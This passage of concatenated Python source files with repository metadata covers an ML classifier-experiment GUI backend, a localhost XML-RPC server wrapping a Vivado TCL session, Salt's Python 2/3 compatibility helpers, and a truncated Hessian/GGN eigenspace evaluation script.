self._dataStats = copy.deepcopy(stats)
if self._origDataStats is None or not actOnly:
self._origDataStats = stats
else:
# We must add classes that were filtered out.
classSamples = self._dataStats.classSamples
deactivate = []
for c in self._origDataStats.classes:
if c not in classSamples:
# We set the maximum, but we must deactivate it.
# The maximum is used because if the user later decides
# to use this class, we need some initial number of samples.
classSamples[c] = self._origDataStats.classSamples[c]
deactivate.append(c)
self._dataStats.classSamples = classSamples
# let's deactivate the filtered-out classes
for c in deactivate:
self._dataStats.deactivateClass(c)
def _loadPlugins(self):
"""
Loads available plugins.
Adds defaults.
:raise RuntimeError: When there is a problem with plugins.
"""
# available features extractors
if len(FEATURE_EXTRACTORS) == 0:
raise RuntimeError("There are no features extractors plugins.")
feTmp = {}
for fe in FEATURE_EXTRACTORS.values():
if fe.getName() in feTmp:
# wow, name collision
raise RuntimeError("Collision of features extractors names. For name: " + fe.getName())
feTmp[fe.getName()] = fe
# let's put the default feature extractor first, if it exists
if self.DEFAULT_FEATURE_EXTRACTOR_NAME in feTmp:
cont = [(self.DEFAULT_FEATURE_EXTRACTOR_NAME, feTmp[self.DEFAULT_FEATURE_EXTRACTOR_NAME])]
# add the rest
cont += [(n, p) for n, p in feTmp.items() if n != self.DEFAULT_FEATURE_EXTRACTOR_NAME]
self._featuresExt = OrderedDict(cont)
else:
self._featuresExt = OrderedDict(feTmp)
# available classifiers
if len(CLASSIFIERS) == 0:
raise RuntimeError("There are no classifiers plugins.")
clsTmp = set()
for cls in CLASSIFIERS.values():
if cls.getName() in clsTmp:
# wow, name collision
raise RuntimeError("Collision of classifiers names. For name: " + cls.getName())
clsTmp.add(cls.getName())
# available Validators
self.availableEvaluationMethods = getAllSubclasses(Validator)
self._evaluationMethod = self.availableEvaluationMethods[0]() # add default
# available Features selectors
self.availableFeatureSelectors = getAllSubclasses(FeaturesSelector)
@property
def featuresSelectors(self):
"""
Features selectors for feature selecting.
"""
return [s.plugin for s in self._featuresSele]
@property
def featuresSelectorsSlots(self):
"""
All used features selector slots.
"""
return self._featuresSele
@property
def classifiersSlots(self):
"""
All currently used classifier slots.
"""
return self._classifiers
@property
def classifiers(self):
"""
Classifiers for testing.
"""
return [s.plugin for s in self._classifiers]
def newClassifierSlot(self):
"""
Creates new slot for classifier that should be tested.
:return: Classifier slot
:rtype: PluginSlot
"""
return self._addPluginSlot(self._classifiers)
def removeClassifierSlot(self, slot: PluginSlot):
"""
Remove classifier slot.
:param slot: Slot for classifier.
:type slot:PluginSlot
"""
self._removePluginSlot(self._classifiers, slot)
def newFeaturesSelectorSlot(self):
"""
Creates new slot for features selector that should be tested.
:return: Features selector slot
:rtype: PluginSlot
"""
return self._addPluginSlot(self._featuresSele)
def removeFeaturesSelectorSlot(self, slot: PluginSlot):
"""
Remove features selector slot.
:param slot: Slot for features selector.
:type slot: PluginSlot
"""
self._removePluginSlot(self._featuresSele, slot)
def _addPluginSlot(self, bank):
"""
Creates new slot in given slot bank.
:param bank: Slot bank
:type bank: List[PluginSlot]
:return: New slot
:rtype: PluginSlot
"""
# lets find first empty id
slotId = 0 if len(bank) == 0 else max(p.id for p in bank) + 1
bank.append(PluginSlot(slotId))
return bank[-1]
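# Sketch of the id allocation above (names and values illustrative): ids are
# max(existing) + 1, so they stay unique even after removals leave gaps.
#
#     s0 = exp.newClassifierSlot()    # id 0
#     s1 = exp.newClassifierSlot()    # id 1
#     exp.removeClassifierSlot(s0)
#     s2 = exp.newClassifierSlot()    # id 2, not 0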
def _removePluginSlot(self, bank: List[PluginSlot], slot: PluginSlot):
"""
Removes a slot from the given slot bank.
:param bank: Slot bank
:type bank: List[PluginSlot]
:param slot: Slot that should be removed.
:type slot: PluginSlot
"""
bank.remove(slot)
@property
def availableClassifiers(self):
"""
Available classifiers plugins.
"""
return CLASSIFIERS
@property
def featuresExt(self):
"""
Available features extractors plugins.
Stored in an OrderedDict (name -> plugin), because it is handy to have the default extractor first
(if it exists).
"""
return self._featuresExt
@Observable._event("NEW_DATA_SET")
def loadDataset(self, filePath: str):
"""
Loads a dataset.
:param filePath: Path to file with dataset.
:type filePath: str
"""
self._dataset = DataSet(filePath)
# prepare new attribute settings
self._attributesSet = {
name: {self.AttributeSettings.USE: True, self.AttributeSettings.PATH: False,
self.AttributeSettings.FEATURE_EXTRACTOR: next(iter(self._featuresExt.values()))()}
for name in self._dataset.attributes}
self._label = None
self._dataStats = None
self._attributesThatShouldBeUsedCache = {}
@property
def evaluationMethod(self):
"""
Validator used for evaluation.
"""
return self._evaluationMethod
@evaluationMethod.setter
def evaluationMethod(self, val):
"""
Validator used for evaluation.
:param val: Validator or name of a validator class.
If a validator name is provided, a new object of its corresponding class is created.
:type val: str | Validator
:raise ValueError: When invalid value is given (unknown name).
"""
if isinstance(val, Validator):
self._evaluationMethod = val
else:
# self.availableEvaluationMethods is a list because we want to preserve order and therefore
# we have no other choice than to iterate over it and find the right one by name.
for v in self.availableEvaluationMethods:
if v.getName() == val:
self._evaluationMethod = v()
return
raise ValueError("Unknown Validator name: " + val)
def setEvaluationMethod(self, val):
"""
Same as evaluationMethod, but can be used as a callable.
:param val: Validator or name of a validator class.
If a validator name is provided, a new object of its corresponding class is created.
:type val: str | Validator
:raise ValueError: When invalid value is given (unknown name).
"""
self.evaluationMethod = val
@property
def label(self):
"""
Attribute name that is set as label or None.
"""
return self._label
def getAttributeSetting(self, attribute: str, t):
"""
Get attribute setting of given type.
:param attribute: The attribute.
:type attribute: str
:param t: The setting type.
:type t: Experiment.AttributeSettings
"""
if t == Experiment.AttributeSettings.LABEL:
return self._label == attribute
return self._attributesSet[attribute][t]
@Observable._event("ATTRIBUTES_CHANGED")
def attributesChangedEvent(self):
"""
This event informs observers that some attribute is no longer used,
has started to be used, or has been marked as the label.
"""
pass
def setAttributeSetting(self, attribute: str, t, val):
"""
Set attribute setting of given type.
:param attribute: The attribute.
:type attribute: str
:param t: The setting type.
:type t: Experiment.AttributeSettings
:param val: New value. For setting a new label, val must be True; if you pass False,
the label will be set to None.
:type val: bool | Plugin
:raise KeyError: When the attribute name is unknown.
"""
if t == Experiment.AttributeSettings.LABEL:
self._label = attribute if val else None
# setting new label invalidates data stats
self.setDataStats(None)
else:
self._attributesSet[attribute][t] = val
if t == Experiment.AttributeSettings.PATH:
# we must inform the data set object
if val:
self._dataset.addPathAttribute(attribute,
self._attributesSet[attribute][
Experiment.AttributeSettings.FEATURE_EXTRACTOR].expDataType())
else:
self._dataset.removePathAttribute(attribute)
if t == Experiment.AttributeSettings.FEATURE_EXTRACTOR and \
attribute in self._dataset.pathAttributes:
# we must inform the data set object
self._dataset.addPathAttribute(attribute, val.expDataType())
if t == Experiment.AttributeSettings.USE or t == Experiment.AttributeSettings.LABEL:
self._attributesThatShouldBeUsedCache = {}
self.attributesChangedEvent()
def attributesThatShouldBeUsed(self, label: bool = True):
"""
Names of attributes that should be used.
:param label: True means that label attribute should be among them.
:type label: bool
"""
# we are preserving original attribute order
try:
return self._attributesThatShouldBeUsedCache[label]
except KeyError:
res = [a for a in self.dataset.attributes \
if self._attributesSet[a][Experiment.AttributeSettings.USE] and (label or a != self._label)]
self._attributesThatShouldBeUsedCache[label] = res
return res
@property
def dataset(self):
"""
Loaded dataset.
"""
return self._dataset
class ExperimentBackgroundRunner(QThread):
"""
Base class for background tasks.
Defines all mandatory signals.
"""
numberOfSteps = Signal(int)
"""Signalizes that we now know the number of steps. Parameter is number of steps."""
step = Signal()
"""Next step finished"""
actInfo = Signal(str)
"""Sends information about what thread is doing now."""
error = Signal(str, str)
"""Sends information about error that cancels background worker.
First string is short error message and second is detailed error description."""
log = Signal(str)
"""Sends log message that should be shown in GUI."""
class MultPMessageType(Enum):
"""
Message type for multiprocessing communication.
"""
NUMBER_OF_STEPS_SIGNAL = auto()
"""Signalizes that we now know the number of steps. Value is number of steps (int)."""
STEP_SIGNAL = auto()
"""Next step finished. Value None."""
ACT_INFO_SIGNAL = auto()
"""Sends information about what process is doing now. Value is string."""
LOG_SIGNAL = auto()
"""Sends log message that should be shown in GUI."""
RESULT_SIGNAL = auto()
"""Sends experiment results."""
ERROR_SIGNAL = auto()
"""Sends information about error that cancels background worker.
Pass a tuple with the message and the detailed message, in that order, to the queue.
If you want to pass just a message, pass it as a regular string."""
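# Sketch of the queue protocol described above; commQ is the
# multiprocessing.Queue the runner passes to work() (values illustrative):
#
#     commQ.put((cls.MultPMessageType.NUMBER_OF_STEPS_SIGNAL, 10))
#     commQ.put((cls.MultPMessageType.ACT_INFO_SIGNAL, "dataset reading"))
#     commQ.put((cls.MultPMessageType.STEP_SIGNAL, None))
#     commQ.put((cls.MultPMessageType.ERROR_SIGNAL, ("short message", "detailed traceback")))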
def __init__(self, experiment: Experiment):
"""
Initialization of background worker.
:param experiment: Work on that experiment.
:type experiment: Experiment
"""
QThread.__init__(self)
self._experiment = copy.copy(experiment)
# remove things that are no longer useful
self._experiment.clearObservers()
saveObservers = None
saveObserversOrig = None
if self._experiment.dataStats is not None:
saveObservers = self._experiment.dataStats.observers
self._experiment.dataStats.clearObservers()
if self._experiment.origDataStats is not None:
saveObserversOrig = self._experiment.origDataStats.observers
self._experiment.origDataStats.clearObservers()
# now we can make a deep copy
self._experiment = copy.deepcopy(self._experiment)
# return original observers
if saveObservers is not None:
experiment.dataStats.observers = saveObservers
if saveObserversOrig is not None:
experiment.origDataStats.observers = saveObserversOrig
def run(self):
"""
Run the background work.
The default implementation creates a new process and communicates with it via a queue.
The actual work must be implemented in the work method.
"""
try:
commQ = multiprocessing.Queue()
p = multiprocessing.Process(target=partial(self.work, self._experiment, commQ))
p.start()
while not self.isInterruptionRequested() and p.is_alive():
try:
msgType, msgValue = commQ.get(True, 0.5) # blocking
self.processMultPMsg(msgType, msgValue)
except queue.Empty:
# nothing here
pass
if p.is_alive():
p.terminate()
while True: # is something still in queue?
try:
msgType, msgValue = commQ.get(True, 0.5) # blocking
self.processMultPMsg(msgType, msgValue)
except queue.Empty:
# nothing here
break
except Exception as e:
# error
self.error.emit(str(e), traceback.format_exc())
@classmethod
def work(cls, experiment: Experiment, commQ: multiprocessing.Queue):
"""
The actual work of that thread
:param experiment: Work on that experiment.
:type experiment: Experiment
:param commQ: Communication queue.
:type commQ: multiprocessing.Queue
"""
raise NotImplemented("Please implement the work method")
def processMultPMsg(self, msgType, msgVal: Any):
"""
Processes message received from another process.
Sends appropriate signals to UI thread.
:param msgType: Type of received message.
:type msgType: MultPMessageType
:param msgVal: The message.
:type msgVal: Any
:return: True if a signal was emitted, False otherwise.
:rtype: bool
"""
if msgType == self.MultPMessageType.NUMBER_OF_STEPS_SIGNAL:
self.numberOfSteps.emit(msgVal)
elif msgType == self.MultPMessageType.STEP_SIGNAL:
self.step.emit()
elif msgType == self.MultPMessageType.ACT_INFO_SIGNAL:
self.actInfo.emit(msgVal)
elif msgType == self.MultPMessageType.LOG_SIGNAL:
self.log.emit(msgVal)
elif msgType == self.MultPMessageType.ERROR_SIGNAL:
if isinstance(msgVal, str):
self.error.emit(msgVal, None)
else:
self.error.emit(msgVal[0], msgVal[1])
else:
return False
return True
class ExperimentStatsRunner(ExperimentBackgroundRunner):
"""
Runs the stats calculation in its own thread.
"""
calcStatsResult = Signal(ExperimentDataStatistics)
"""Sends calculated statistics."""
@classmethod
def work(cls, experiment: Experiment, commQ: multiprocessing.Queue):
"""
Stats calculation.
:param experiment: Work on that experiment.
:type experiment: Experiment
:param commQ: Communication queue.
:type commQ: multiprocessing.Queue
"""
try:
experiment.useDataSubset()
statsExp = ExperimentDataStatistics()
statsExp.attributes = experiment.attributesThatShouldBeUsed(False)
# reading, samples, attributes
commQ.put((cls.MultPMessageType.NUMBER_OF_STEPS_SIGNAL, 2 + len(statsExp.attributes)))
commQ.put((cls.MultPMessageType.ACT_INFO_SIGNAL, "dataset reading"))
# ok, let's first read the data
data, labels = experiment.dataset.toNumpyArray([
statsExp.attributes,
[experiment.label]
])
if data.shape[0] == 0:
# no data
commQ.put((cls.MultPMessageType.ERROR_SIGNAL, ("no data", "Given data set does not have any samples.")))
return
labels = labels.ravel() # we need row vector
commQ.put((cls.MultPMessageType.STEP_SIGNAL, None))
commQ.put((cls.MultPMessageType.ACT_INFO_SIGNAL, "samples counting"))
classSamples = {}
classes, samples = np.unique(labels, return_counts=True)
for actClass, actClassSamples in zip(classes, samples):
classSamples[actClass] = actClassSamples
statsExp.classSamples = classSamples
# extractors mapping
extMap = [(a, experiment.getAttributeSetting(a, Experiment.AttributeSettings.FEATURE_EXTRACTOR)) \
for a in experiment.attributesThatShouldBeUsed(False)]
commQ.put((cls.MultPMessageType.STEP_SIGNAL, None))
# get the attributes values
for i, (attr, extractor) in enumerate(extMap):
commQ.put((cls.MultPMessageType.ACT_INFO_SIGNAL, "attribute: " + attr))
actF = extractor.fitAndExtract(data[:, i], labels).tocsc()
statsExp.attributesFeatures[attr] = actF.shape[1]
statsExp.attributesAVGFeatureSD[attr] = np.average(
np.array([(sparseMatVariance(actF[:, c])) ** 0.5 for c in range(actF.shape[1])]))
commQ.put((cls.MultPMessageType.STEP_SIGNAL, None))
commQ.put((cls.MultPMessageType.ACT_INFO_SIGNAL, "Done"))
commQ.put((cls.MultPMessageType.RESULT_SIGNAL, statsExp))
except Exception as e:
# error
commQ.put((cls.MultPMessageType.ERROR_SIGNAL, (str(e), traceback.format_exc())))
finally:
commQ.close()
commQ.join_thread()
def processMultPMsg(self, msgType, msgVal: Any):
"""
Processes message received from another process.
Sends appropriate signals to UI thread.
:param msgType: Type of received message.
:type msgType: MultPMessageType
:param msgVal: The message.
:type msgVal: Any
:return: True if a signal was emitted, False otherwise.
:rtype: bool
"""
if not super().processMultPMsg(msgType, msgVal):
if msgType == self.MultPMessageType.RESULT_SIGNAL:
self.calcStatsResult.emit(msgVal)
else:
return False
return True
return True  # super() already emitted a signal
class ExperimentRunner(ExperimentBackgroundRunner):
"""
Runs the experiment in its own thread.
"""
result = Signal(Results)
"""Send signal with experiment results."""
@classmethod
def work(cls, experiment: Experiment, commQ: multiprocessing.Queue):
"""
The actual work of that thread.
:param experiment: Work on that experiment.
:type experiment: Experiment
:param commQ: Communication queue.
:type commQ: multiprocessing.Queue
"""
try:
experiment.useDataSubset()
# remove things that are no longer useful
experiment.setDataStats(None)
commQ.put((cls.MultPMessageType.ACT_INFO_SIGNAL, "dataset reading"))
logger = Logger() # get singleton instance of logger
# reg event
logger.registerObserver("LOG",
lambda logMsg: commQ.put((cls.MultPMessageType.LOG_SIGNAL, logMsg)))
# ok, let's first read the data
data, labels = experiment.dataset.toNumpyArray([
experiment.attributesThatShouldBeUsed(False),
[experiment.label]
])
if data.shape[0] == 0:
# no data
commQ.put((cls.MultPMessageType.ACT_INFO_SIGNAL, "no data"))
return
labels = labels.ravel() # we need row vector
lEnc = LabelEncoder()
# let's encode labels to save some memory space
# also this is more suitable representation for some classifiers such as neural networks
labels = lEnc.fit_transform(labels)
# extractors mapping
extMap = [experiment.getAttributeSetting(a, Experiment.AttributeSettings.FEATURE_EXTRACTOR) \
for a in experiment.attributesThatShouldBeUsed(False)]
# create storage for results
steps = experiment.evaluationMethod.numOfSteps(experiment.dataset, data, labels)
commQ.put((cls.MultPMessageType.NUMBER_OF_STEPS_SIGNAL,
(len(experiment.classifiers) * 2 + experiment.evaluationMethod.NUMBER_OF_FEATURES_STEP) * (
steps) + 1))
# +1 reading
# len(experiment.classifiers)*2 one step for testing and one for training of one classifier
commQ.put((cls.MultPMessageType.STEP_SIGNAL, None)) # because reading is finished
resultsStorage = Results(steps, experiment.classifiers, lEnc)
for step, c, predicted, importantFeatures, importanceOfFeatures, realLabels, testIndices, \
stepTimes, stats in experiment.evaluationMethod.run(experiment.dataset, experiment.classifiers,
data, experiment.attributesThatShouldBeUsed(False),
labels, extMap, experiment.featuresSelectors,
cls.nextSubStep(commQ)):
if resultsStorage.steps[step].labels is None:
# because it does not make much sense to store the true labels for each prediction,
# we store the labels just once for each validation step
resultsStorage.steps[step].labels = realLabels
resultsStorage.steps[step].addResults(c, predicted, importantFeatures, importanceOfFeatures,
testIndices, stepTimes, stats)
transRealLabels = lEnc.inverse_transform(realLabels)
transPredictedLabels = lEnc.inverse_transform(predicted)
cls.writeConfMat(transPredictedLabels, transRealLabels)
logger.log(classification_report(transRealLabels,
transPredictedLabels))
logger.log("accuracy\t{}".format(accuracy_score(realLabels, predicted)))
logger.log("\n\n")
resultsStorage.finalize() # for better score calculation
commQ.put((cls.MultPMessageType.RESULT_SIGNAL, resultsStorage))
except Exception as e:
# error
commQ.put((cls.MultPMessageType.ERROR_SIGNAL, (str(e), traceback.format_exc())))
finally:
commQ.close()
commQ.join_thread()
@classmethod
def nextSubStep(cls, commQ: multiprocessing.Queue):
"""
Informs UI about next substep.
:param commQ: Communication queue.
:type commQ: multiprocessing.Queue
"""
def x(msg):
commQ.put((cls.MultPMessageType.ACT_INFO_SIGNAL, msg))
commQ.put((cls.MultPMessageType.STEP_SIGNAL, None))
return x
def processMultPMsg(self, msgType, msgVal: Any):
"""
Processes message received from another process.
Sends appropriate signals to UI thread.
:param msgType: Type of received message.
:type msgType: MultPMessageType
:param msgVal: The message.
:type msgVal: Any
:return: True if a signal was emitted, False otherwise.
:rtype: bool
"""
if not super().processMultPMsg(msgType, msgVal):
if msgType == self.MultPMessageType.RESULT_SIGNAL:
self.result.emit(msgVal)
else:
return False
return True
return True  # super() already emitted a signal
@staticmethod
def writeConfMat(predicted, labels):
pd.set_option('display.expand_frame_repr', False)
pd.set_option('display.max_rows', None)
pd.set_option('display.max_columns', None)
pd.set_option('display.max_colwidth',
len(max(predicted, key=len)) if len(max(predicted, key=len)) > len(max(labels, key=len)) else len(
max(labels, key=len)))
Logger().log(str(pd.crosstab(pd.Series(labels), pd.Series(predicted), rownames=['Real'], colnames=['Predicted'],
margins=True)))
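# Sketch of the crosstab output produced above (class labels illustrative):
#
#     Predicted  cat  dog  All
#     Real
#     cat          8    2   10
#     dog          1    9   10
#     All          9   11   20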
| 32.820611
| 120
| 0.588627
|
74e480be8e85798accbb27173976341c3e1382fe
| 1,933
|
py
|
Python
|
msemu/server.py
|
sgherbst/msemu
|
a99f1380c707d34ddc4554b09db50c6d24605838
|
[
"MIT"
] | 2
|
2020-03-19T20:58:12.000Z
|
2020-07-08T09:20:41.000Z
|
msemu/server.py
|
sgherbst/msemu
|
a99f1380c707d34ddc4554b09db50c6d24605838
|
[
"MIT"
] | null | null | null |
msemu/server.py
|
sgherbst/msemu
|
a99f1380c707d34ddc4554b09db50c6d24605838
|
[
"MIT"
] | 1
|
2021-12-27T19:23:40.000Z
|
2021-12-27T19:23:40.000Z
|
SERVER_PORT = 57937
def get_client():
import xmlrpc.client
return xmlrpc.client.ServerProxy(f'http://localhost:{SERVER_PORT}')
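# Usage sketch, assuming the server below is already running and a VIO
# named "vio_0" exists in the Vivado hardware manager:
#
#     client = get_client()
#     client.set_vio('vio_0', 1)
#     print(client.get_vio('vio_0'))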
def main():
# modified from https://docs.python.org/3.7/library/xmlrpc.server.html?highlight=xmlrpc
print('Launching Vivado TCL server...')
import pexpect
from xmlrpc.server import SimpleXMLRPCServer
from xmlrpc.server import SimpleXMLRPCRequestHandler
# Restrict to a particular path.
class RequestHandler(SimpleXMLRPCRequestHandler):
rpc_paths = ('/RPC2',)
# Instantiate TCL evaluator
child = pexpect.spawnu('vivado -nolog -nojournal -notrace -mode tcl')
child.expect('Vivado% ')
# Create server
with SimpleXMLRPCServer(('localhost', SERVER_PORT),
requestHandler=RequestHandler,
allow_none=True) as server:
server.register_introspection_functions()
def sendline(line):
child.sendline(line)
child.expect('Vivado% ')
return child.before
def set_vio(name, value):
sendline(f'set_property OUTPUT_VALUE {value} ${name}')
sendline(f'commit_hw_vio ${name}')
def get_vio(name):
before = sendline(f'get_property INPUT_VALUE ${name}')
before = before.splitlines()[-1] # get last line
before = before.strip() # strip off whitespace
return before
def pulse_reset():
sendline('pulse_reset $rst')
def refresh_hw_vio(name):
sendline(f'refresh_hw_vio ${name}')
server.register_function(sendline)
server.register_function(set_vio)
server.register_function(get_vio)
server.register_function(pulse_reset)
server.register_function(refresh_hw_vio)
print(f'Server ready on port {SERVER_PORT}.')
server.serve_forever()
if __name__ == '__main__':
main()
| 31.688525
| 91
| 0.639421
|
81e2134eca351705f341558a006f2aa1493061eb
| 4,029
|
py
|
Python
|
salt/_compat.py
|
gotcha/salt
|
7b84c704777d3d2062911895dc3fdf93d40e9848
|
[
"Apache-2.0"
] | 1
|
2016-07-07T18:43:05.000Z
|
2016-07-07T18:43:05.000Z
|
salt/_compat.py
|
gotcha/salt
|
7b84c704777d3d2062911895dc3fdf93d40e9848
|
[
"Apache-2.0"
] | null | null | null |
salt/_compat.py
|
gotcha/salt
|
7b84c704777d3d2062911895dc3fdf93d40e9848
|
[
"Apache-2.0"
] | 1
|
2020-12-04T11:28:06.000Z
|
2020-12-04T11:28:06.000Z
|
'''
Salt compatibility code
'''
# Import python libs
import sys
import types
try:
import cPickle as pickle
except ImportError:
import pickle
# True if we are running on Python 3.
PY3 = sys.version_info[0] == 3
if PY3:
MAX_SIZE = sys.maxsize
else:
MAX_SIZE = sys.maxint
# pylint: disable-msg=C0103
if PY3:
string_types = str,
integer_types = int,
class_types = type,
text_type = str
binary_type = bytes
long = int
else:
string_types = basestring,
integer_types = (int, long)
class_types = (type, types.ClassType)
text_type = unicode
binary_type = str
long = long
if PY3:
def callable(obj):
return any('__call__' in klass.__dict__ for klass in type(obj).__mro__)
else:
callable = callable
def text_(s, encoding='latin-1', errors='strict'):
'''
If ``s`` is an instance of ``binary_type``, return
``s.decode(encoding, errors)``, otherwise return ``s``
'''
if isinstance(s, binary_type):
return s.decode(encoding, errors)
return s
def bytes_(s, encoding='latin-1', errors='strict'):
'''
If ``s`` is an instance of ``text_type``, return
``s.encode(encoding, errors)``, otherwise return ``s``
'''
if isinstance(s, text_type):
return s.encode(encoding, errors)
return s
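# Usage sketch for the two helpers above; both default to latin-1 and
# behave the same way on Python 2 and 3:
#
#     assert text_(b'caf\xe9') == u'caf\xe9'   # bytes -> text
#     assert bytes_(u'caf\xe9') == b'caf\xe9'  # text -> bytes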
if PY3:
def ascii_native_(s):
if isinstance(s, text_type):
s = s.encode('ascii')
return str(s, 'ascii', 'strict')
else:
def ascii_native_(s):
if isinstance(s, text_type):
s = s.encode('ascii')
return str(s)
ascii_native_.__doc__ = '''
Python 3: If ``s`` is an instance of ``text_type``, return
``s.encode('ascii')``, otherwise return ``str(s, 'ascii', 'strict')``
Python 2: If ``s`` is an instance of ``text_type``, return
``s.encode('ascii')``, otherwise return ``str(s)``
'''
if PY3:
def native_(s, encoding='latin-1', errors='strict'):
'''
If ``s`` is an instance of ``text_type``, return
``s``, otherwise return ``str(s, encoding, errors)``
'''
if isinstance(s, text_type):
return s
return str(s, encoding, errors)
else:
def native_(s, encoding='latin-1', errors='strict'):
'''
If ``s`` is an instance of ``text_type``, return
``s.encode(encoding, errors)``, otherwise return ``str(s)``
'''
if isinstance(s, text_type):
return s.encode(encoding, errors)
return str(s)
native_.__doc__ = '''
Python 3: If ``s`` is an instance of ``text_type``, return ``s``, otherwise
return ``str(s, encoding, errors)``
Python 2: If ``s`` is an instance of ``text_type``, return
``s.encode(encoding, errors)``, otherwise return ``str(s)``
'''
if PY3:
from urllib import parse
from urllib.error import URLError
import http.server as BaseHTTPServer
from urllib.error import HTTPError
urlparse = parse
from urllib.parse import quote as url_quote
from urllib.parse import quote_plus as url_quote_plus
from urllib.parse import unquote as url_unquote
from urllib.parse import urlencode as url_encode
from urllib.request import urlopen as url_open
url_unquote_text = url_unquote
url_unquote_native = url_unquote
else:
from urlparse import urlparse
import BaseHTTPServer
from urllib2 import HTTPError, URLError
from urllib import quote as url_quote
from urllib import quote_plus as url_quote_plus
from urllib import unquote as url_unquote
from urllib import urlencode as url_encode
from urllib2 import urlopen as url_open
def url_unquote_text(v, encoding='utf-8', errors='replace'):
v = url_unquote(v)
return v.decode(encoding, errors)
def url_unquote_native(v, encoding='utf-8', errors='replace'):
return native_(url_unquote_text(v, encoding, errors))
if PY3:
zip = zip
else:
from future_builtins import zip
if PY3:
from io import StringIO
else:
from StringIO import StringIO
# pylint: enable-msg=C0103
| 26.86
| 79
| 0.647059
|
02ad4e06ffe649fa4288ddd9b44762967115cb9a
| 8,095
|
py
|
Python
|
exp/exp13_full_batch_monitoring/eval.py
|
jbzrE7bp/vivit
|
69e45ed82265d1abe18acbc17507756f686884d9
|
[
"MIT"
] | null | null | null |
exp/exp13_full_batch_monitoring/eval.py
|
jbzrE7bp/vivit
|
69e45ed82265d1abe18acbc17507756f686884d9
|
[
"MIT"
] | null | null | null |
exp/exp13_full_batch_monitoring/eval.py
|
jbzrE7bp/vivit
|
69e45ed82265d1abe18acbc17507756f686884d9
|
[
"MIT"
] | null | null | null |
"""This script performs the evaluation for the configuration and checkpoint specified
by the two command line arguments `config_str` and `checkpoint`. An example call looks
like this: `python ./eval.py --config_str cifar10_resnet32_sgd --checkpoint 0 0`.
The evaluation includes the following computations:
1) full-batch gradient
2) top-C eigenvectors of the full-batch GGN
3) top-C eigenvectors of the full-batch Hessian
NOTE: All computed quantities for one particular configuration and one particular
checkpoint are stored in the same folder determined by `get_eval_savedir`.
"""
import argparse
import os
from warnings import warn
import dill
import torch
from config import CHECKPOINTS_OUTPUT, config_str_to_config
from run_eval import get_eval_savedir
from scipy.sparse.linalg import eigsh
from torch.utils.data import DataLoader, TensorDataset
from exp.utils.deepobs import get_deterministic_deepobs_train_loader
from exp.utils.deepobs_runner import CheckpointRunner
from vivit.hessianfree import GGNLinearOperator, HessianLinearOperator
USE_ONE_BATCH = False # For debugging: Dataloader only contains one batch
VERBOSE = True
CHECK_DETERMINISTIC = True
DEV = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# ======================================================================================
# I/O: Utilities for loading checkpoints and saving results of the evaluation
# ======================================================================================
def load_checkpoint(problem_cls, optimizer_cls, checkpoint):
"""Load checkpointed model and loss function. Returns `None` if checkpoint is not
found.
"""
savepath = CheckpointRunner.get_checkpoint_savepath(
checkpoint, optimizer_cls, problem_cls, CHECKPOINTS_OUTPUT, extension=".pt"
)
print(f"Loading checkpoint from {savepath}")
try:
return torch.load(savepath, pickle_module=dill)
except OSError:
warn(f"Checkpoint {checkpoint} not found at {savepath}. Returning `None`.")
return None
def get_eval_savepath(
problem_cls, optimizer_cls, checkpoint, file_name, extension=".pt"
):
"""Get savepath for some result of the evaluation named `file_name`."""
savedir = get_eval_savedir(problem_cls, optimizer_cls, checkpoint)
return os.path.join(savedir, f"{file_name}{extension}")
def numpy_to_torch32(numpy_array):
"""Convert numpy array into torch float32 tensor"""
return (torch.from_numpy(numpy_array)).to(torch.float32)
# ======================================================================================
# Evaluation
# ======================================================================================
def eval_Hessian(model, loss_func, dataloader, num_classes, savepath):
"""Evaluate and store top-C eigenspace of the Hessian"""
if VERBOSE:
print(f"\neval_Hessian: Storing results at {savepath}")
if os.path.exists(savepath):
print(f"File {savepath} already exists. Skipping computation.")
else:
H = HessianLinearOperator(
model,
loss_func,
dataloader,
DEV,
progressbar=False,
check_deterministic=CHECK_DETERMINISTIC,
)
H_evals, H_evecs = eigsh(H, k=num_classes, which="LM")
H_results = {
"H_evals": numpy_to_torch32(H_evals),
"H_evecs": numpy_to_torch32(H_evecs),
}
torch.save(H_results, savepath)
def eval_GGN(model, loss_func, dataloader, num_classes, savepath):
"""Evaluate and store top-C eigenspace of the GGN"""
if VERBOSE:
print(f"\neval_GGN: Storing results at {savepath}")
if os.path.exists(savepath):
print(f"File {savepath} already exists. Skipping computation.")
else:
G = GGNLinearOperator(
model,
loss_func,
dataloader,
DEV,
progressbar=False,
check_deterministic=CHECK_DETERMINISTIC,
)
G_evals, G_evecs = eigsh(G, k=num_classes, which="LM")
G_results = {
"G_evals": numpy_to_torch32(G_evals),
"G_evecs": numpy_to_torch32(G_evecs),
}
torch.save(G_results, savepath)
def eval_gradient(model, loss_func, dataloader, savepath):
"""Evaluate and store gradient"""
if VERBOSE:
print(f"\neval_gradient: Storing results at {savepath}")
if os.path.exists(savepath):
print(f"File {savepath} already exists. Skipping computation.")
else:
H = HessianLinearOperator(
model,
loss_func,
dataloader,
DEV,
progressbar=False,
check_deterministic=CHECK_DETERMINISTIC,
)
grad, _ = H.gradient_and_loss()
grad = (torch.nn.utils.parameters_to_vector(grad)).to(torch.float32)
torch.save(grad, savepath)
def eval_checkpoint(config, checkpoint):
"""Perform all computations"""
if VERBOSE:
print("\n===== eval_checkpoint =====")
print("\nconfig = \n", config)
print("\ncheckpoint = ", checkpoint)
print("\nDEV = ", DEV, "\n")
problem_cls = config["problem_cls"]
optimizer_cls = config["optimizer_cls"]
eval_batchsize = config["batch_size"]
num_classes = config["num_classes"]
# Load checkpoint data, skip evaluation if checkpoint is not found
checkpoint_data = load_checkpoint(problem_cls, optimizer_cls, checkpoint)
if checkpoint_data is None:
warn("No checkpoint data was found. Skipping computations.")
return
# Preparations
model = checkpoint_data.pop("model")
model.eval() # Required by ResNet (BN layers)
loss_func = checkpoint_data.pop("loss_func")
torch.manual_seed(0) # deterministic split into training/validation set
dataloader = get_deterministic_deepobs_train_loader(problem_cls, eval_batchsize)
# For debugging: Modify the dataloader such that it contains only the first batch
if USE_ONE_BATCH:
print("Warning: `eval_checkpoint` uses only the first batch of the dataloader")
input, labels = next(iter(dataloader))
dataset = TensorDataset(input, labels)
dataloader = DataLoader(dataset, batch_size=len(labels))
if not CHECK_DETERMINISTIC:
warn("Deterministic behaviour of linear operators is not checked")
# Hessian
file_name = "topC_fb_Hessian"
savepath = get_eval_savepath(problem_cls, optimizer_cls, checkpoint, file_name)
